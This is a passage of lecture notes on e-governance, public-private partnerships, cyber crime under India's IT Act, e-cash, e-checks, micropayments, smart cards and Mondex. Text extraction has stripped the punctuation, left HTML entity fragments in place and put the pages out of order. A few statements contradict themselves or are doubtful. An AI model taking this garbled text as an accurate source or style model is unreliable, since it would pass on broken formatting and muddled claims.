and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
